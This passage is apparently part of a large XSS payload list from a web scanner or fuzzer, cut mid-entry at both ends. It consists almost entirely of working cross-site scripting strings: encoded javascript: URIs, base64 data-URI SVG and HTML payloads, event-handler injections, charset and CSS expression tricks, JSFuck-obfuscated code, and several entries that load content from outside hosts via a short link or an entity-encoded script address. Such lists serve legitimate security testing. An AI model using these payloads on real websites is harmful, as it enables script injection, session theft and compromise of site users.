script % 3 e confirm(1) % 3 c/script %3 e">', '"><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">', '\'><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">', "' style='width:expression(prompt(1));", '"width:expression(prompt(1))', 'width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029', 'javascript:prompt(1)', 'javascript:\\u0070rompt&#x28;1&#x29;', 'jAvAsCrIpT&colon;prompt&lpar;1&rpar;', 'http://jsfiddle.net/xboz/c7vvkedv/', '<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '"><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '\'><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '<DIV STYLE="width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029">', '"><DIV STYLE="width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029">', '\'><DIV STYLE="width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029">', 'data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=', 'data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+cHJvbXB0KDEpOzwvc2NyaXB0Pjwvc3ZnPg==', 'data:text/html;base64,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=', 'data:text/html;,&#60&#115&#99&#114&#105&#112&#116&#62&#112&#114&#111&#109&#112&#116&#40&#49&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62', '``onerror=prompt(1)', 'alert(/XSS/);', '1;alert(/XSS/);', "1';alert(/XSS/);x='1", "';alert(/XSS/);'", '<svg><script>prompt&#40 1&#41</script>', '"><svg><script>prompt&#40 1&#41</script>', "'><svg><script>prompt&#40 1&#41</script>", '<html> <script> var a="</script><script>alert(1)//";</script> </html>', '"><html> <script> var a="</script><script>alert(1)//";</script> </html>', '\'><html> <script> var a="</script><script>alert(1)//";</script> </html>', '&#34;><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', "'';}}</script><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<body onpageshow=alert(1)>', '"><body onpageshow=alert(1)>', "'><body onpageshow=alert(1)>", '<body onpageshow=alert(1);>', '"><body onpageshow=alert(1);>', "'><body onpageshow=alert(1);>", '<body/onpageshow=alert(1)>', '"><body/onpageshow=alert(1)>', "'><body/onpageshow=alert(1)>", '<body/onpageshow=alert(1);>', '"><body/onpageshow=alert(1);>', "'><body/onpageshow=alert(1);>", '"><b/onclick="javascript:window.window.window[\'alert\'](1)">bold', "<body language=vbs onload=window.location='data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='>", '"><body language=vbs onload=window.location=\'data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==\'>', "'><body language=vbs onload=window.location='data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='>", 'behaviour:url\\0028javascript:alert\\0028[0][0]\\0029\\0029', '<iframe src="javascript:x:alert(1)">', '"><iframe src="javascript:x:alert(1)">', '\'><iframe src="javascript:x:alert(1)">', '<a href="javascript:x:alert(1)">x</a>', '"><a href="javascript:x:alert(1)">x</a>', '\'><a href="javascript:x:alert(1)">x</a>', '<a href=j&#x00000000041vascr&#x00000000069pt:alert(1)>X</a>', '"><a href=j&#x00000000041vascr&#x00000000069pt:alert(1)>X</a>', "'><a href=j&#x00000000041vascr&#x00000000069pt:alert(1)>X</a>", '<div contextmenu=x>right-click<menu id=x onshow=alert(1)>', '"><div contextmenu=x>right-click<menu id=x onshow=alert(1)>', "'><div contextmenu=x>right-click<menu id=x onshow=alert(1)>", '";document.body.addEventListener("DOMActivate",alert(1))//', '/*@cc_on @if(1)alert(1)@end', 'var a=0; ((a == 1) ? 2 : alert(1));//', '(0)[\'constructor\'][\'constructor\']("\\141\\154\\145\\162\\164(1)")();', '<input oninput=alert(1)>', '"><input oninput=alert(1)>', "'><input oninput=alert(1)>", '<video onprogress=alert(1)><source src=//a.a>', '"><video onprogress=alert(1)><source src=//a.a>', "'><video onprogress=alert(1)><source src=//a.a>", '<video onprogress=alert(1)><source src=x>', '"><video onprogress=alert(1)><source src=x>', "'><video onprogress=alert(1)><source src=x>", '<video/onprogress=alert(1)><source/src=//a.a>', '"><video/onprogress=alert(1)><source/src=//a.a>', "'><video/onprogress=alert(1)><source/src=//a.a>", '<video/onprogress=alert(1)><source/src=x>', '"><video/onprogress=alert(1)><source/src=x>', "'><video/onprogress=alert(1)><source/src=x>", '<video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', '"><video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', "'><video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>", '<video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', '"><video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', "'><video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>", '<svg onload=\\u0061lert(1)>', '"><svg onload=\\u0061lert(1)>', "'><svg onload=\\u0061lert(1)>", '<meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>', '"><meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>', "'><meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>", '<meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>', '"><meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>', "'><meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>", '<meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>', '"><meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>', "'><meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>", '<meta charset=Shift_JIS><script>x="?\\";alert(1)//"</script>', '"><meta charset=Shift_JIS><script>x="?\\";alert(1)//"</script>', '\'><meta charset=Shift_JIS><script>x="?\\";alert(1)//"</script>', 'this["alert"]("X")', "this['alert'](1)", '<script>this["alert"]("X")</script>', '</ScrIpt><script>this["alert"]("X")</script>', '"><script>this["alert"]("X")</script>', '</ScrIpt><script>this["alert"]("X")</script>', '\'><script>this["alert"]("X")</script>', '</ScrIpt><script>this["alert"]("X")</script>', '<svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//', '"><svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//', "'><svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//", '<svg\x0conload=alert(1)>', '"><svg\x0conload=alert(1)>', "'><svg\x0conload=alert(1)>", '<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />', '"><svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />', '\'><svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />', '"-alert(1)-"', '"/alert(1)/"', '"|alert(1)|"', '==alert(1)==', '[alert(1)]+', '^alert(1)^', '|alert(1)|', '&alert(1)&', '>>alert(1)>>', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '"><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '\'><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)"', "'|\\u0061lert()|'", '<style%0conload=alert(1)>', '"><style%0conload=alert(1)>', "'><style%0conload=alert(1)>", '<ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>', '"><ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>', "'><ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>", '<scrip<script>t>alert(1)</script>', '"><scrip<script>t>alert(1)</script>', "'><scrip<script>t>alert(1)</script>", "javasCript:eval%28'aler'+'t'+'%28%29'%29", '&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;', 'Data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '<img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>', '"><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>', "'><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>", '<IMG SRC="jav\tascript:alert(\'X\');">', '"><IMG SRC="jav\tascript:alert(\'X\');">', '\'><IMG SRC="jav\tascript:alert(\'X\');">', '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("X")>', '"><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("X")>', '\'><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("X")>', '\\";alert(\'X\');//', '&#x00027;; confirm(1); &#x00027;', '&#39;; confirm(1); &#39;', '%27; confirm(1); %27', '&apos;; confirm(1); &apos;', '\\u0027 confirm(1); \\u0027', '"; [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])(); "', '"; eval(\'\\u0061\'+\'\\x6c\'+\'e\'+\'r\'+\'t\')(2); "', '"; alert&#40 3&#41 ; "', '"; javascript:&#x61;ler\\u0074&lpar;4); "', '"; javascript:window.open(\'data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==\'); "', '"onmouseover="alert(1)', '&#34;onmouseover=&#34;alert(1)', '&#x00022;onmouseover=&#x00022;alert(1)', '%22onmouseover=%22alert(1)', '&quot;onmouseover=&quot;alert(1)', '\\u0022onmouseover=\\u0022alert(1)', 'width:expression(prompt(1))', 'width:ex/**/pression(prompt(1))', 'width&#x3A;ex/**/pression&#x28;prompt&#x28;1&#x29;&#x29;', 'width:expression\\28 prompt \\28 1 \\29 \\29', 'width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029"', 'background-image: url(javascript:prompt(1))', '<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe', '"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe', "'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe", '"><img src=x onerror=window.open(\'http://www.opensecurity.in/\');>', '<object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', '"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', "'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>", '<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>', '"><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>', '\'><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>', '<svg+onload=confirm(1);>', '"><svg+onload=confirm(1);>', "'><svg+onload=confirm(1);>", '<svg onload=prompt(1);>', '"><svg onload=prompt(1);>', "'><svg onload=prompt(1);>", '<input+onfocus=alert(1)>', '"><input+onfocus=alert(1)>', "'><input+onfocus=alert(1)>", '???script?alert(1)?/script?', '&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;', '<a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>', '"><a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>', '\'><a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">X</a>', '<scr\\x00ipt>confirm(1);</scr\\x00ipt>', '"><scr\\x00ipt>confirm(1);</scr\\x00ipt>', "'><scr\\x00ipt>confirm(1);</scr\\x00ipt>", '<svg/onload=prompt(1);>', '"><svg/onload=prompt(1);>', "'><svg/onload=prompt(1);>", '<svg><script>alert&#40/1/&#41</script>', '"><svg><script>alert&#40/1/&#41</script>', "'><svg><script>alert&#40/1/&#41</script>", '<isindex action="javas&Tab;cript:alert(1)" type=image>', '"><isindex action="javas&Tab;cript:alert(1)" type=image>', '\'><isindex action="javas&Tab;cript:alert(1)" type=image>', "<form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK", '"><form action=\'data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt\'><button>CLICK', "'><form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK", "<form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK", '"><form action=\'java&Tab;scri&Tab;pt:alert(1)\'><button>CLICK', "'><form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK", '<form action=javascript&NewLine;:alert(1)><input type=submit>', '"><form action=javascript&NewLine;:alert(1)><input type=submit>', "'><form action=javascript&NewLine;:alert(1)><input type=submit>", '<form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>', '"><form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>', '\'><form action="javas&Tab;cript:alert(1)" method="get"><input type="submit" value="Submit"></form>', '<form action="&Tab;javas&Tab;cript&Tab;:alert(\'X :)\')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>', '"><form action="&Tab;javas&Tab;cript&Tab;:alert(\'X :)\')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>', '\'><form action="&Tab;javas&Tab;cript&Tab;:alert(\'X :)\')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>', '<form id="myform" value="" action=javascript&Tab;:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '"><form id="myform" value="" action=javascript&Tab;:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '\'><form id="myform" value="" action=javascript&Tab;:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '\'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', '"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', "'></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/X/) type=submit>\'-->"></script><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>\'"><img src="http://127.0.0.1:3555/xss_serve_payloads/X.jpg">', '<script>var url = "<!--<script>";//</script>alert(1)</script>', '</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>', '"><script>var url = "<!--<script>";//</script>alert(1)</script>', '</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>', '\'><script>var url = "<!--<script>";//</script>alert(1)</script>', '</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>', '<form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '"><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '\'><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript&Tab;:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '<iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">', '"><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">', '\'><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">', '<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))', '"><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))', "'><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))", "<img/src='http://127.0.0.1:3555/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)", '"><img/src=\'http://127.0.0.1:3555/xss_serve_payloads/X.jpg\' onmouseover=&Tab;prompt(1)', "'><img/src='http://127.0.0.1:3555/xss_serve_payloads/X.jpg' onmouseover=&Tab;prompt(1)", '<svg><script>alert&#40 1&#41', '"><svg><script>alert&#40 1&#41', "'><svg><script>alert&#40 1&#41", '<embed/src=//goo.gl/nlX0P>', '"><embed/src=//goo.gl/nlX0P>', "'><embed/src=//goo.gl/nlX0P>", '<object/data=//goo.gl/nlX0P>', '"><object/data=//goo.gl/nlX0P>', "'><object/data=//goo.gl/nlX0P>", 'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")', "x: /**/ression(alert(1))('\\')exp\\')", '/*@cc_on alert(1) @*/', '{get[alert`1`](){}}', 'a= {get[alert`1`](){}}', 'alert`1`', '-alert`1`-', '+alert`1`+', "+alert(1)+'", '\\u{0000000000000061}lert(1)', '"onmouseover=%0A"confirm(1)', '/src=data:,alert(1)', 'accesskey="X" onclick="alert(1)""', 'accesskey=X onclick=alert(1)', '$})}}}});alert(1);({0:{0:{0:function(){0({', "''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}", 'javascript://\'/</title></style></textarea></script>--><p"%0A onclick=alert(1)//>*/alert(1)/*', 'javascript://--></script></title></style>"/</textarea>*/<alert(1)/*\'%0A onclick=alert(1)//>a', 'javascript://</title>"/</script></style></textarea/-->*/<alert(1)/*\'%0D%0A onclick=alert(1)//>/', 'javascript://\'/</title></style></textarea></script>--><p"%0D%0A onclick=alert(1)//>*/alert(1)/*', '%09javascript://\'/</title></style></textarea></script>--><p"%0D%0A onclick=alert(1)//>*/alert(1)/*', 'javascript:/*--></title></style></textarea></script><svg/onload=click() onclick=\'+/" /+/ onmouseover=1/+/[*/[]/+alert(1)//\'>', 'javascript:alert(1)//</title></style></script>-->";alert(1)//*/alert(1)/*<a \';alert(1)//\\\' onclick=alert(1)//> %0D %0A alert(1)//', 'javascript:alert(1)//--></script></textarea></style></title><a"//\' onclick=alert(1)//>*/alert(1)/*', 'avascript:/*--></textarea></style></button></script></meta><select/onclick=\'+/"/+/[*/[]/+alert(1)//\'>', '<style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>', '"><style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>', "'><style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>", '<div style=\'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")\'>aa</div>', '"><div style=\'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")\'>aa</div>', '\'><div style=\'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")\'>aa</div>', '<div style="x: /**/ression(alert(1))(\'\\\')exp\\\')">', '"><div style="x: /**/ression(alert(1))(\'\\\')exp\\\')">', '\'><div style="x: /**/ression(alert(1))(\'\\\')exp\\\')">', '<script>/*@cc_on alert(1) @*/</script>', '</ScrIpt><script>/*@cc_on alert(1) @*/</script>', '"><script>/*@cc_on alert(1) @*/</script>', '</ScrIpt><script>/*@cc_on alert(1) @*/</script>', "'><script>/*@cc_on alert(1) @*/</script>", '</ScrIpt><script>/*@cc_on alert(1) @*/</script>', '<picture><source srcset=1><img onerror=alert(1)>', '"><picture><source srcset=1><img onerror=alert(1)>', "'><picture><source srcset=1><img onerror=alert(1)>", "<script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", "</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", '"><script>\'\'+{valueOf:location, 